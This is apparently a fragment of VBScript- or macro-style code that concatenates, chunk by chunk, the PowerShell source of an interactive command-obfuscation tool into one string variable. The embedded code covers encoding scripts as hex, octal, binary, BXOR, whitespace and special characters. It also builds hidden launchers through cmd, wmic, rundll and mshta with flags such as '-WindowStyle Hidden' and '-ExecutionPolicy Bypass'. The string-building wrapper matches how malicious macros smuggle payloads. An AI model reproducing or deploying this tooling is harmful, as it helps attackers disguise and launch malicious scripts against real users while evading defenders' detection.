Ouzw = Ouzw + " $Script:ExecutionC"
Ouzw = Ouzw + "ommands = @()
"
Ouzw = Ouzw + " $Script:LauncherApplied = $FALSE
"
Ouzw = Ouzw + "
"
Ouzw = Ouzw + " Write-Host "`n`nSuccessfully set ScriptPat"
Ouzw = Ouzw + "h (as URL):" -ForegroundColor Cyan
"
Ouzw = Ouzw + " Write-Host $Script:ScriptPath -Fo"
Ouzw = Ouzw + "regroundColor Magenta
"
Ouzw = Ouzw + "}
ElseIf ((Get-Item $U"
Ouzw = Ouzw + "serInputOptionValue) -is [System.IO.DirectoryInfo]"
Ouzw = Ouzw + ")
{
"
Ouzw = Ouzw + " # ScriptPath does not exist.
"
Ouzw = Ouzw + " Write-Host "`n`nERROR:" -"
Ouzw = Ouzw + "NoNewLine -ForegroundColor Red
"
Ouzw = Ouzw + " Write-Host ' Path is a directory inst"
Ouzw = Ouzw + "ead of a file (' -NoNewLine
"
Ouzw = Ouzw + " Write-Host "$UserInputOptionValue" -NoNe"
Ouzw = Ouzw + "wLine -ForegroundColor Cyan
"
Ouzw = Ouzw + " Write-Host ").`n" -NoNewLine
"
Ouzw = Ouzw + " }
Els"
Ouzw = Ouzw + "e
{
"
Ouzw = Ouzw + " # Read contents from user-input Scri"
Ouzw = Ouzw + "ptPath value.
Get-"
Ouzw = Ouzw + "ChildItem $UserInputOptionValue -ErrorAction Stop "
Ouzw = Ouzw + "| Out-Null
$Script"
Ouzw = Ouzw + ":ScriptBlock = [IO.File]::ReadAllText((Resolve-Pat"
Ouzw = Ouzw + "h $UserInputOptionValue))
"
Ouzw = Ouzw + "
# Set script-wide"
Ouzw = Ouzw + " variables for future reference.
"
Ouzw = Ouzw + " $Script:ScriptPath ="
Ouzw = Ouzw + " $UserInputOptionValue
"
Ouzw = Ouzw + " $Script:ObfuscatedCommand = $Script:S"
Ouzw = Ouzw + "criptBlock
$Script"
Ouzw = Ouzw + ":ObfuscatedCommandHistory = @()
"
Ouzw = Ouzw + " $Script:ObfuscatedCommandHistory +="
Ouzw = Ouzw + " $Script:ScriptBlock
"
Ouzw = Ouzw + " $Script:CliSyntax = @()
"
Ouzw = Ouzw + " $Script:ExecutionCommands"
Ouzw = Ouzw + " = @()
$Sc"
Ouzw = Ouzw + "ript:LauncherApplied = $FALSE
"
Ouzw = Ouzw + "
"
Ouzw = Ouzw + " Write-Host "`n`nSuccessfully set ScriptPath:" -Fo"
Ouzw = Ouzw + "regroundColor Cyan
"
Ouzw = Ouzw + " Write-Host $Script:ScriptPath -ForegroundColor Ma"
Ouzw = Ouzw + "genta
}
"
Ouzw = Ouzw + " }
Else
"
Ouzw = Ouzw + " {
# Scr"
Ouzw = Ouzw + "iptPath not found (failed Test-Path).
"
Ouzw = Ouzw + " Write-Host "`n`nERROR:" -NoNewLine"
Ouzw = Ouzw + " -ForegroundColor Red
"
Ouzw = Ouzw + "Write-Host ' Path not found (' -NoNewLine
"
Ouzw = Ouzw + " Write-Host "$UserInputOptionVa"
Ouzw = Ouzw + "lue" -NoNewLine -ForegroundColor Cyan
"
Ouzw = Ouzw + " Write-Host ").`n" -NoNewLine
"
Ouzw = Ouzw + " }
}
"
Ouzw = Ouzw + " 'scriptblock' {
"
Ouzw = Ouzw + " # Remove evenly paired {} '' or "" if user incl"
Ouzw = Ouzw + "udes it around their scriptblock input.
"
Ouzw = Ouzw + " ForEach($Char in @(@('{','}'),@('"',"
Ouzw = Ouzw + "'"'),@("'","'")))
{
"
Ouzw = Ouzw + " While($UserInputOptionValue."
Ouzw = Ouzw + "StartsWith($Char[0]) -AND $UserInputOptionValue.En"
Ouzw = Ouzw + "dsWith($Char[1]))
{
"
Ouzw = Ouzw + " $UserInputOptionValu"
Ouzw = Ouzw + "e = $UserInputOptionValue.SubString(1,$UserInputOp"
Ouzw = Ouzw + "tionValue.Length-2).Trim()
"
Ouzw = Ouzw + " }
}
"
Ouzw = Ouzw + " # Check if input is PowerShell encoded com"
Ouzw = Ouzw + "mand syntax so we can decode for scriptblock.
"
Ouzw = Ouzw + " If($UserInputOptionValue -Matc"
Ouzw = Ouzw + "h 'powershell(.exe | )\s*-(e |ec |en |enc |enco |e"
Ouzw = Ouzw + "ncod |encode)\s*["'']*[a-z=]')
"
Ouzw = Ouzw + " {
# Extract encod"
Ouzw = Ouzw + "ed command.
$EncodedCo"
Ouzw = Ouzw + "mmand = $UserInputOptionValue.SubString($UserInput"
Ouzw = Ouzw + "OptionValue.ToLower().IndexOf(' -e')+3)
"
Ouzw = Ouzw + " $EncodedCommand = $EncodedComman"
Ouzw = Ouzw + "d.SubString($EncodedCommand.IndexOf(' ')).Trim(" '"
Ouzw = Ouzw + "`"")
# Decode Unicode"
Ouzw = Ouzw + "-encoded $EncodedCommand
"
Ouzw = Ouzw + " $UserInputOptionValue = [System.Text.Encoding]:"
Ouzw = Ouzw + ":Unicode.GetString([System.Convert]::FromBase64Str"
Ouzw = Ouzw + "ing($EncodedCommand))
}
"
Ouzw = Ouzw + " # Set script-wide variables"
Ouzw = Ouzw + " for future reference.
$Sc"
Ouzw = Ouzw + "ript:ScriptPath = 'N/A'
"
Ouzw = Ouzw + " $Script:ScriptBlock = $"
Ouzw = Ouzw + "UserInputOptionValue
$Scri"
Ouzw = Ouzw + "pt:ObfuscatedCommand = $UserInputOptionVal"
Ouzw = Ouzw + "ue
$Script:ObfuscatedComma"
Ouzw = Ouzw + "ndHistory = @()
$Script:O"
Ouzw = Ouzw + "bfuscatedCommandHistory += $UserInputOptionValue
"
Ouzw = Ouzw + " $Script:CliSyntax "
Ouzw = Ouzw + " = @()
$Script:Execu"
Ouzw = Ouzw + "tionCommands = @()
"
Ouzw = Ouzw + " $Script:LauncherApplied = $FALSE
"
Ouzw = Ouzw + "
Write-Host "
Ouzw = Ouzw + ""`n`nSuccessfully set ScriptBlock:" -ForegroundCol"
Ouzw = Ouzw + "or Cyan
Write-Host $Script"
Ouzw = Ouzw + ":ScriptBlock -ForegroundColor Magenta
"
Ouzw = Ouzw + " }
'emptyvalue' {
"
Ouzw = Ouzw + " # No OPTIONVALUE was entered af"
Ouzw = Ouzw + "ter OPTIONNAME.
$HasError "
Ouzw = Ouzw + "= $TRUE
Write-Host "`n`nER"
Ouzw = Ouzw + "ROR:" -NoNewLine -ForegroundColor Red
"
Ouzw = Ouzw + " Write-Host ' No value was entered afte"
Ouzw = Ouzw + "r' -NoNewLine
Write-Host '"
Ouzw = Ouzw + " SCRIPTBLOCK/SCRIPTPATH' -NoNewLine -ForegroundCol"
Ouzw = Ouzw + "or Cyan
Write-Host '.' -No"
Ouzw = Ouzw + "NewLine
}
"
Ouzw = Ouzw + "default {Write-Error "An invalid OPTIONNAME ($User"
Ouzw = Ouzw + "InputOptionName) was passed to switch block."; Exi"
Ouzw = Ouzw + "t}
}
}
Els"
Ouzw = Ouzw + "e
{
$HasError = $TRUE
"
Ouzw = Ouzw + " Write-Host "`n`nERROR:" -NoNewLine"
Ouzw = Ouzw + " -ForegroundColor Red
Write-Host '"
Ouzw = Ouzw + " OPTIONNAME' -NoNewLine
Write-Host"
Ouzw = Ouzw + " " $UserInputOptionName" -NoNewLine -ForegroundCol"
Ouzw = Ouzw + "or Cyan
Write-Host " is not a sett"
Ouzw = Ouzw + "able option." -NoNewLine
}
"
Ouzw = Ouzw + " If($HasError)
{
"
Ouzw = Ouzw + "Write-Host "`n Correct syntax is" -NoNewLine"
Ouzw = Ouzw + "
Write-Host ' SET OPTIONNAME VALUE"
Ouzw = Ouzw + "' -NoNewLine -ForegroundColor Green
"
Ouzw = Ouzw + " Write-Host '.' -NoNewLine
"
Ouzw = Ouzw + " Write-Host "`n Enter" -NoNewLine
"
Ouzw = Ouzw + " Write-Host ' SHOW OPTIONS' -NoNewLine -For"
Ouzw = Ouzw + "egroundColor Yellow
Write-Host ' f"
Ouzw = Ouzw + "or more details.'
}
}
"
Ouzw = Ouzw + "ElseIf(($AcceptableInput -Contains $UserInput) -OR"
Ouzw = Ouzw + " ($OverrideAcceptableInput))
{
"
Ouzw = Ouzw + " # User input matches $AcceptableInput extracted f"
Ouzw = Ouzw + "rom the current $Menu, so decide if:
#"
Ouzw = Ouzw + " 1) an obfuscation function needs to be called and"
Ouzw = Ouzw + " remain in current interactive prompt, or
"
Ouzw = Ouzw + " # 2) return value to enter into a new interact"
Ouzw = Ouzw + "ive prompt.
# Format breadcrumb trail"
Ouzw = Ouzw + " to successfully retrieve the next interactive pro"
Ouzw = Ouzw + "mpt.
$UserInput = $BreadCrumb.Trim('\'"
Ouzw = Ouzw + ").Replace('\','_') + '_' + $UserInput
"
Ouzw = Ouzw + "If($BreadCrumb.StartsWith('\')) {$UserInput = '_' "
Ouzw = Ouzw + "+ $UserInput}
# If the current select"
Ouzw = Ouzw + "ion contains a command to execute then continue. O"
Ouzw = Ouzw + "therwise return to go to another menu.
"
Ouzw = Ouzw + " If($SelectionContainsCommand)
{
"
Ouzw = Ouzw + " # Make sure user has entered command or"
Ouzw = Ouzw + " path to script.
If($Script:Obfusc"
Ouzw = Ouzw + "atedCommand -ne $NULL)
{
"
Ouzw = Ouzw + " # Iterate through lines in $Menu to ext"
Ouzw = Ouzw + "ract command for the current selection in $UserInp"
Ouzw = Ouzw + "ut.
ForEach($Line in $Menu)
"
Ouzw = Ouzw + " {
If($Li"
Ouzw = Ouzw + "ne[1].Trim(' ') -eq $UserInput.SubString($UserInpu"
Ouzw = Ouzw + "t.LastIndexOf('_')+1)) {$CommandToExec = $Line[3];"
Ouzw = Ouzw + " Continue}
}
"
Ouzw = Ouzw + " If(!$OverrideAcceptableInput)
"
Ouzw = Ouzw + " {
# Extract arguments "
Ouzw = Ouzw + "from $CommandToExec.
$Func"
Ouzw = Ouzw + "tion = $CommandToExec[0]
$"
Ouzw = Ouzw + "Token = $CommandToExec[1]
"
Ouzw = Ouzw + " $ObfLevel = $CommandToExec[2]
"
Ouzw = Ouzw + " }
Else
"
Ouzw = Ouzw + "{
# Overload above argumen"
Ouzw = Ouzw + "ts if $OverrideAcceptableInput is $TRUE, and extra"
Ouzw = Ouzw + "ct $Function from $BreadCrumb
"
Ouzw = Ouzw + " Switch($BreadCrumb.ToLower())
"
Ouzw = Ouzw + " {
'\launcher\p"
Ouzw = Ouzw + "s' {$Function = 'Out-PowerShellLauncher'; $O"
Ouzw = Ouzw + "bfLevel = 1}
'\launche"
Ouzw = Ouzw + "r\cmd' {$Function = 'Out-PowerShellLauncher';"
Ouzw = Ouzw + " $ObfLevel = 2}
'\laun"
Ouzw = Ouzw + "cher\wmic' {$Function = 'Out-PowerShellLaunche"
Ouzw = Ouzw + "r'; $ObfLevel = 3}
'\l"
Ouzw = Ouzw + "auncher\rundll' {$Function = 'Out-PowerShellLaun"
Ouzw = Ouzw + "cher'; $ObfLevel = 4}
"
Ouzw = Ouzw + "'\launcher\var+' {$Function = 'Out-PowerShellL"
Ouzw = Ouzw + "auncher'; $ObfLevel = 5}
"
Ouzw = Ouzw + " '\launcher\stdin+' {$Function = 'Out-PowerShe"
Ouzw = Ouzw + "llLauncher'; $ObfLevel = 6}
"
Ouzw = Ouzw + " '\launcher\clip+' {$Function = 'Out-Power"
Ouzw = Ouzw + "ShellLauncher'; $ObfLevel = 7}
"
Ouzw = Ouzw + " '\launcher\var++' {$Function = 'Out-Po"
Ouzw = Ouzw + "werShellLauncher'; $ObfLevel = 8}
"
Ouzw = Ouzw + " '\launcher\stdin++' {$Function = 'Out"
Ouzw = Ouzw + "-PowerShellLauncher'; $ObfLevel = 9}
"
Ouzw = Ouzw + " '\launcher\clip++' {$Function = '"
Ouzw = Ouzw + "Out-PowerShellLauncher'; $ObfLevel = 10}
"
Ouzw = Ouzw + " '\launcher\rundll++' {$Function"
Ouzw = Ouzw + " = 'Out-PowerShellLauncher'; $ObfLevel = 11}
"
Ouzw = Ouzw + " '\launcher\mshta++' {$Func"
Ouzw = Ouzw + "tion = 'Out-PowerShellLauncher'; $ObfLevel = 12}
"
Ouzw = Ouzw + " default {Write-Error "A"
Ouzw = Ouzw + "n invalid value ($($BreadCrumb.ToLower())) was pas"
Ouzw = Ouzw + "sed to switch block for setting `$Function when `$"
Ouzw = Ouzw + "OverrideAcceptableInput -eq `$TRUE."; Exit}
"
Ouzw = Ouzw + " }
# Extr"
Ouzw = Ouzw + "act $ObfLevel from first element in array (in case"
Ouzw = Ouzw + " 0th element is used for informational purposes), "
Ouzw = Ouzw + "and extract $Token from $BreadCrumb.
"
Ouzw = Ouzw + " $ObfLevel = $Menu[1][3][2]
"
Ouzw = Ouzw + " $Token = $UserInput.SubString($UserInp"
Ouzw = Ouzw + "ut.LastIndexOf('_')+1)
}
"
Ouzw = Ouzw + " # Convert ObfuscatedCommand (strin"
Ouzw = Ouzw + "g) to ScriptBlock for next obfuscation function.
"
Ouzw = Ouzw + " If(!($Script:LauncherApplied))
"
Ouzw = Ouzw + " {
$Obf"
Ouzw = Ouzw + "CommandScriptBlock = $ExecutionContext.InvokeComma"
Ouzw = Ouzw + "nd.NewScriptBlock($Script:ObfuscatedCommand)
"
Ouzw = Ouzw + " }
"
Ouzw = Ouzw + " # Validate that user has set SCRIPTPATH or"
Ouzw = Ouzw + " SCRIPTBLOCK (by seeing if $Script:ObfuscatedComma"
Ouzw = Ouzw + "nd is empty).
If($Script:Obfus"
Ouzw = Ouzw + "catedCommand -eq '')
{
"
Ouzw = Ouzw + " Write-Host "`n`nERROR:" -NoNewLin"
Ouzw = Ouzw + "e -ForegroundColor Red
Wri"
Ouzw = Ouzw + "te-Host " Cannot execute obfuscation commands with"
Ouzw = Ouzw + "out setting ScriptPath or ScriptBlock values in SH"
Ouzw = Ouzw + "OW OPTIONS menu. Set these by executing" -NoNewLin"
Ouzw = Ouzw + "e
Write-Host ' SET SCRIPTB"
Ouzw = Ouzw + "LOCK script_block_or_command' -NoNewLine -Foregrou"
Ouzw = Ouzw + "ndColor Green
Write-Host '"
Ouzw = Ouzw + " or' -NoNewLine
Write-Host"
Ouzw = Ouzw + " ' SET SCRIPTPATH path_to_script_or_URL' -NoNewLin"
Ouzw = Ouzw + "e -ForegroundColor Green
W"
Ouzw = Ouzw + "rite-Host '.'
Continue
"
Ouzw = Ouzw + " }
# Save cur"
Ouzw = Ouzw + "rent ObfuscatedCommand to see if obfuscation was s"
Ouzw = Ouzw + "uccessful (i.e. no warnings prevented obfuscation "
Ouzw = Ouzw + "from occurring).
$ObfuscatedCo"
Ouzw = Ouzw + "mmandBefore = $Script:ObfuscatedCommand
"
Ouzw = Ouzw + " $CmdToPrint = $NULL
"
Ouzw = Ouzw + " If($Script:LauncherApplied)
{"
Ouzw = Ouzw + "
If($Function -eq 'Out-Pow"
Ouzw = Ouzw + "erShellLauncher')
{
"
Ouzw = Ouzw + " $ErrorMessage = ' You have a"
Ouzw = Ouzw + "lready applied a launcher to ObfuscatedCommand.'
"
Ouzw = Ouzw + " }
E"
Ouzw = Ouzw + "lse
{
"
Ouzw = Ouzw + " $ErrorMessage = ' You cannot obfuscate aft"
Ouzw = Ouzw + "er applying a Launcher to ObfuscatedCommand.'
"
Ouzw = Ouzw + " }
Wri"
Ouzw = Ouzw + "te-Host "`n`nERROR:" -NoNewLine -ForegroundColor R"
Ouzw = Ouzw + "ed
Write-Host $ErrorMessag"
Ouzw = Ouzw + "e -NoNewLine
Write-Host "`"
Ouzw = Ouzw + "n Enter" -NoNewLine
"
Ouzw = Ouzw + "Write-Host ' UNDO' -NoNewLine -ForegroundColor Yel"
Ouzw = Ouzw + "low
Write-Host " to remove"
Ouzw = Ouzw + " the launcher from ObfuscatedCommand.`n" -NoNewLin"
Ouzw = Ouzw + "e
}
Else
"
Ouzw = Ouzw + " {
# Swi"
Ouzw = Ouzw + "tch block to route to the correct function.
"
Ouzw = Ouzw + " Switch($Function)
"
Ouzw = Ouzw + " {
'Out-Obfus"
Ouzw = Ouzw + "catedTokenCommand' {
"
Ouzw = Ouzw + " $Script:ObfuscatedCommand = Out-Obfuscat"
Ouzw = Ouzw + "edTokenCommand -ScriptBlock $ObfCommandScri"
Ouzw = Ouzw + "ptBlock $Token $ObfLevel
"
Ouzw = Ouzw + " $CmdToPrint = @("Out-ObfuscatedTokenCommand"
Ouzw = Ouzw + " -ScriptBlock "," '$Token' $ObfLevel")
"
Ouzw = Ouzw + " }
'Ou"
Ouzw = Ouzw + "t-ObfuscatedTokenCommandAll' {
"
Ouzw = Ouzw + " $Script:ObfuscatedCommand = Out-O"
Ouzw = Ouzw + "bfuscatedTokenCommand -ScriptBlock $ObfComm"
Ouzw = Ouzw + "andScriptBlock
$Cm"
Ouzw = Ouzw + "dToPrint = @("Out-ObfuscatedTokenCommand -ScriptBl"
Ouzw = Ouzw + "ock ","")
}
"
Ouzw = Ouzw + " 'Out-ObfuscatedStringCommand' "
Ouzw = Ouzw + " {
$Script:Obfu"
Ouzw = Ouzw + "scatedCommand = Out-ObfuscatedStringCommand "
Ouzw = Ouzw + "-ScriptBlock $ObfCommandScriptBlock $ObfLevel
"
Ouzw = Ouzw + " $CmdToPrint = @("Out-O"
Ouzw = Ouzw + "bfuscatedStringCommand -ScriptBlock "," $ObfLevel""
Ouzw = Ouzw + ")
}
"
Ouzw = Ouzw + " 'Out-EncodedAsciiCommand' {
"
Ouzw = Ouzw + " $Script:ObfuscatedCo"
Ouzw = Ouzw + "mmand = Out-EncodedAsciiCommand -ScriptB"
Ouzw = Ouzw + "lock $ObfCommandScriptBlock -PassThru
"
Ouzw = Ouzw + " $CmdToPrint = @("Out-EncodedAs"
Ouzw = Ouzw + "ciiCommand -ScriptBlock "," -PassThru")
"
Ouzw = Ouzw + " }
'O"
Ouzw = Ouzw + "ut-EncodedHexCommand' {
"
Ouzw = Ouzw + " $Script:ObfuscatedCommand = Out-"
Ouzw = Ouzw + "EncodedHexCommand -ScriptBlock $ObfCom"
Ouzw = Ouzw + "mandScriptBlock -PassThru
"
Ouzw = Ouzw + " $CmdToPrint = @("Out-EncodedHexCommand -Sc"
Ouzw = Ouzw + "riptBlock "," -PassThru")
"
Ouzw = Ouzw + " }
'Out-EncodedOcta"
Ouzw = Ouzw + "lCommand' {
"
Ouzw = Ouzw + " $Script:ObfuscatedCommand = Out-EncodedOctalCo"
Ouzw = Ouzw + "mmand -ScriptBlock $ObfCommandScriptBloc"
Ouzw = Ouzw + "k -PassThru
$CmdTo"
Ouzw = Ouzw + "Print = @("Out-EncodedOctalCommand -ScriptBlock ","
Ouzw = Ouzw + "" -PassThru")
}
"
Ouzw = Ouzw + " 'Out-EncodedBinaryCommand' "
Ouzw = Ouzw + " {
$Script:"
Ouzw = Ouzw + "ObfuscatedCommand = Out-EncodedBinaryCommand "
Ouzw = Ouzw + " -ScriptBlock $ObfCommandScriptBlock -PassThru
"
Ouzw = Ouzw + " $CmdToPrint = @("O"
Ouzw = Ouzw + "ut-EncodedBinaryCommand -ScriptBlock "," -PassThru"
Ouzw = Ouzw + "")
}
"
Ouzw = Ouzw + " 'Out-SecureStringCommand' {
"
Ouzw = Ouzw + " $Script:ObfuscatedC"
Ouzw = Ouzw + "ommand = Out-SecureStringCommand -Script"
Ouzw = Ouzw + "Block $ObfCommandScriptBlock -PassThru
"
Ouzw = Ouzw + " $CmdToPrint = @("Out-SecureSt"
Ouzw = Ouzw + "ringCommand -ScriptBlock "," -PassThru")
"
Ouzw = Ouzw + " }
'"
Ouzw = Ouzw + "Out-EncodedBXORCommand' {
"
Ouzw = Ouzw + " $Script:ObfuscatedCommand = Out"
Ouzw = Ouzw + "-EncodedBXORCommand -ScriptBlock $ObfCo"
Ouzw = Ouzw + "mmandScriptBlock -PassThru
"
Ouzw = Ouzw + " $CmdToPrint = @("Out-EncodedBXORCommand -"
Ouzw = Ouzw + "ScriptBlock "," -PassThru")
"
Ouzw = Ouzw + " }
'Out-EncodedSp"
Ouzw = Ouzw + "ecialCharOnlyCommand' {
"
Ouzw = Ouzw + " $Script:ObfuscatedCommand = Out-EncodedSpeci"
Ouzw = Ouzw + "alCharOnlyCommand -ScriptBlock $ObfCommandScriptBl"
Ouzw = Ouzw + "ock -PassThru
$Cmd"
Ouzw = Ouzw + "ToPrint = @("Out-EncodedSpecialCharOnlyCommand -Sc"
Ouzw = Ouzw + "riptBlock "," -PassThru")
"
Ouzw = Ouzw + " }
'Out-EncodedWhit"
Ouzw = Ouzw + "espaceCommand' {
$"
Ouzw = Ouzw + "Script:ObfuscatedCommand = Out-EncodedWhitespaceCo"
Ouzw = Ouzw + "mmand -ScriptBlock $ObfCommandScriptBlock -Pa"
Ouzw = Ouzw + "ssThru
$CmdToPrint"
Ouzw = Ouzw + " = @("Out-EncodedWhitespaceCommand -ScriptBlock ","
Ouzw = Ouzw + "" -PassThru")
}
"
Ouzw = Ouzw + " 'Out-PowerShellLauncher' "
Ouzw = Ouzw + " {
# Extrac"
Ouzw = Ouzw + "t numbers from string so we can output proper flag"
Ouzw = Ouzw + " syntax in ExecutionCommands history.
"
Ouzw = Ouzw + " $SwitchesAsStringArray = [char"
Ouzw = Ouzw + "[]]$Token | Sort-Object -Unique | Where-Object {$_"
Ouzw = Ouzw + " -ne ' '}
"
Ouzw = Ouzw + " If($SwitchesAsStringArray"
Ouzw = Ouzw + " -Contains '0')
{
"
Ouzw = Ouzw + " $CmdToPrint = "
Ouzw = Ouzw + "@("Out-PowerShellLauncher -ScriptBlock "," $ObfLev"
Ouzw = Ouzw + "el")
}
"
Ouzw = Ouzw + " Else
"
Ouzw = Ouzw + " {
$Has"
Ouzw = Ouzw + "WindowStyle = $FALSE
"
Ouzw = Ouzw + " $SwitchesToPrint = @()
"
Ouzw = Ouzw + " ForEach($Value in $SwitchesAsStrin"
Ouzw = Ouzw + "gArray)
{
"
Ouzw = Ouzw + " Switch($Value)"
Ouzw = Ouzw + "
{
"
Ouzw = Ouzw + " 1 {$SwitchesT"
Ouzw = Ouzw + "oPrint += '-NoExit'}
"
Ouzw = Ouzw + " 2 {$SwitchesToPrint += '-NonInterac"
Ouzw = Ouzw + "tive'}
"
Ouzw = Ouzw + " 3 {$SwitchesToPrint += '-NoLogo'}
"
Ouzw = Ouzw + " 4 {$SwitchesToPrint +"
Ouzw = Ouzw + "= '-NoProfile'}
"
Ouzw = Ouzw + " 5 {$SwitchesToPrint += '-Command'}
"
Ouzw = Ouzw + " 6 {If(!$Has"
Ouzw = Ouzw + "WindowStyle) {$SwitchesToPrint += '-WindowStyle Hi"
Ouzw = Ouzw + "dden'; $HasWindowStyle = $TRUE}}
"
Ouzw = Ouzw + " 7 {$SwitchesToPrint += "
Ouzw = Ouzw + "'-ExecutionPolicy Bypass'}
"
Ouzw = Ouzw + " 8 {$SwitchesToPrint += '-Wow6"
Ouzw = Ouzw + "4'}
de"
Ouzw = Ouzw + "fault {Write-Error "An invalid `$SwitchesAsString "
Ouzw = Ouzw + "value ($Value) was passed to switch block."; Exit;"
Ouzw = Ouzw + "}
}
"
Ouzw = Ouzw + " }
"
Ouzw = Ouzw + " $SwitchesToPrint = $SwitchesToP"
Ouzw = Ouzw + "rint -Join ' '
"
Ouzw = Ouzw + " $CmdToPrint = @("Out-PowerShellLauncher -ScriptBl"
Ouzw = Ouzw + "ock "," $SwitchesToPrint $ObfLevel")
"
Ouzw = Ouzw + " }
"
Ouzw = Ouzw + "
$Script:Obfusc"
Ouzw = Ouzw + "atedCommand = Out-PowerShellLauncher -ScriptBlock "
Ouzw = Ouzw + "$ObfCommandScriptBlock -SwitchesAsString $Token $O"
Ouzw = Ouzw + "bfLevel
"
Ouzw = Ouzw + " # Only set LauncherApplied "
Ouzw = Ouzw + "to true if before/after are different (i.e. no war"
Ouzw = Ouzw + "nings prevented launcher from being applied).
"
Ouzw = Ouzw + " If($ObfuscatedCommandB"
Ouzw = Ouzw + "efore -ne $Script:ObfuscatedCommand)
"
Ouzw = Ouzw + " {
"
Ouzw = Ouzw + " $Script:LauncherApplied = $TRUE
"
Ouzw = Ouzw + " }
"
Ouzw = Ouzw + " }
default {Write-Erro"
Ouzw = Ouzw + "r "An invalid `$Function value ($Function) was pas"
Ouzw = Ouzw + "sed to switch block."; Exit;}
"
Ouzw = Ouzw + " }
If(($Script:Obfusca"
Ouzw = Ouzw + "tedCommand -ceq $ObfuscatedCommandBefore) -AND ($M"
Ouzw = Ouzw + "enuName.StartsWith('_Token_')))
"
Ouzw = Ouzw + " {
Write-Host "`n"
Ouzw = Ouzw + "WARNING:" -NoNewLine -ForegroundColor Red
"
Ouzw = Ouzw + " Write-Host " There were not an"
Ouzw = Ouzw + "y" -NoNewLine
If($Brea"
Ouzw = Ouzw + "dCrumb.SubString($BreadCrumb.LastIndexOf('\')+1).T"
Ouzw = Ouzw + "oLower() -ne 'all') {Write-Host " $($BreadCrumb.Su"
Ouzw = Ouzw + "bString($BreadCrumb.LastIndexOf('\')+1))" -NoNewLi"
Ouzw = Ouzw + "ne -ForegroundColor Yellow}
"
Ouzw = Ouzw + " Write-Host " tokens to further obfuscate, so"
Ouzw = Ouzw + " nothing changed."
}
"
Ouzw = Ouzw + " Else
{
"
Ouzw = Ouzw + " # Add to $Script:Obfus"
Ouzw = Ouzw + "catedCommandHistory if a change took place for the"
Ouzw = Ouzw + " current ObfuscatedCommand.
"
Ouzw = Ouzw + " $Script:ObfuscatedCommandHistory += , $Scrip"
Ouzw = Ouzw + "t:ObfuscatedCommand
"
Ouzw = Ouzw + " # Convert UserInput to CLI syntax to store in C"
Ouzw = Ouzw + "liSyntax variable if obfuscation occurred.
"
Ouzw = Ouzw + " $CliSyntaxCurrentCommand = $U"
Ouzw = Ouzw + "serInput.Trim('_ ').Replace('_','\')
"
Ouzw = Ouzw + " # Add CLI command syntax to $S"
Ouzw = Ouzw + "cript:CliSyntax to maintain a history of commands "
Ouzw = Ouzw + "to arrive at current obfuscated command for CLI sy"
Ouzw = Ouzw + "ntax.
$Script:CliSynta"
Ouzw = Ouzw + "x += $CliSyntaxCurrentCommand
"
Ouzw = Ouzw + " # Add execution syntax to $Script:Executi"
Ouzw = Ouzw + "onCommands to maintain a history of commands to ar"
Ouzw = Ouzw + "rive at current obfuscated command.
"
Ouzw = Ouzw + " $Script:ExecutionCommands += ($CmdTo"
Ouzw = Ouzw + "Print[0] + '$ScriptBlock' + $CmdToPrint[1])
"
Ouzw = Ouzw + " # Output syntax of CLI synt"
Ouzw = Ouzw + "ax and full command we executed in above Switch bl"
Ouzw = Ouzw + "ock.
Write-Host "`nExe"
Ouzw = Ouzw + "cuted:`t"
Write-Host ""
Ouzw = Ouzw + " CLI: " -NoNewline
W"
Ouzw = Ouzw + "rite-Host $CliSyntaxCurrentCommand -ForegroundColo"
Ouzw = Ouzw + "r Cyan
Write-Host " F"
Ouzw = Ouzw + "ULL: " -NoNewline
Writ"
Ouzw = Ouzw + "e-Host $CmdToPrint[0] -NoNewLine -ForegroundColor "
Ouzw = Ouzw + "Cyan
Write-Host '$Scri"
Ouzw = Ouzw + "ptBlock' -NoNewLine -ForegroundColor Magenta
"
Ouzw = Ouzw + " Write-Host $CmdToPrint[1] -"
Ouzw = Ouzw + "ForegroundColor Cyan
"
Ouzw = Ouzw + "# Output obfuscation result.
"
Ouzw = Ouzw + " Write-Host "`nResult:`t"
"
Ouzw = Ouzw + " Out-ScriptContents $Script:ObfuscatedCom"
Ouzw = Ouzw + "mand -PrintWarning
}
"
Ouzw = Ouzw + " }
}
}
"
Ouzw = Ouzw + " Else
{
Retu"
Ouzw = Ouzw + "rn $UserInput
}
}
Else"
Ouzw = Ouzw + "
{
If ($MenuInputOptionsSho"
Ouzw = Ouzw + "wHelp[0] -Contains $UserInput) {Show-HelpMenu}"
Ouzw = Ouzw + "
ElseIf($MenuInputOptionsShowOptions[0"
Ouzw = Ouzw + "] -Contains $UserInput) {Show-OptionsMenu}
"
Ouzw = Ouzw + " ElseIf($TutorialInputOptions[0] -Con"
Ouzw = Ouzw + "tains $UserInput) {Show-Tutorial}
Else"
Ouzw = Ouzw + "If($ClearScreenInputOptions[0] -Contains $Use"
Ouzw = Ouzw + "rInput) {Clear-Host}
# For Version 1.0"
Ouzw = Ouzw + " ASCII art is not necessary.
#ElseIf($"
Ouzw = Ouzw + "ShowAsciiArtInputOptions[0] -Contains $UserInp"
Ouzw = Ouzw + "ut) {Show-AsciiArt -Random}
ElseIf($Re"
Ouzw = Ouzw + "setObfuscationInputOptions[0] -Contains $UserInput"
Ouzw = Ouzw + ")
{
If(($Script:Obfusc"
Ouzw = Ouzw + "atedCommand -ne $NULL) -AND ($Script:ObfuscatedCom"
Ouzw = Ouzw + "mand.Length -eq 0))
{
"
Ouzw = Ouzw + " Write-Host "`n`nWARNING:" -NoNewLine -Fore"
Ouzw = Ouzw + "groundColor Red
Write-Host " O"
Ouzw = Ouzw + "bfuscatedCommand has not been set. There is nothin"
Ouzw = Ouzw + "g to reset."
}
Els"
Ouzw = Ouzw + "eIf($Script:ObfuscatedCommand -ceq $Script:ScriptB"
Ouzw = Ouzw + "lock)
{
Write-"
Ouzw = Ouzw + "Host "`n`nWARNING:" -NoNewLine -ForegroundColor Re"
Ouzw = Ouzw + "d
Write-Host " No obfuscation "
Ouzw = Ouzw + "has been applied to ObfuscatedCommand. There is no"
Ouzw = Ouzw + "thing to reset."
}
"
Ouzw = Ouzw + " Else
{
$Scrip"
Ouzw = Ouzw + "t:LauncherApplied = $FALSE
$Sc"
Ouzw = Ouzw + "ript:ObfuscatedCommand = $Script:ScriptBlock
"
Ouzw = Ouzw + " $Script:ObfuscatedCommandHistory = "
Ouzw = Ouzw + "@($Script:ScriptBlock)
$Script"
Ouzw = Ouzw + ":CliSyntax = @()
$Scri"
Ouzw = Ouzw + "pt:ExecutionCommands = @()
"
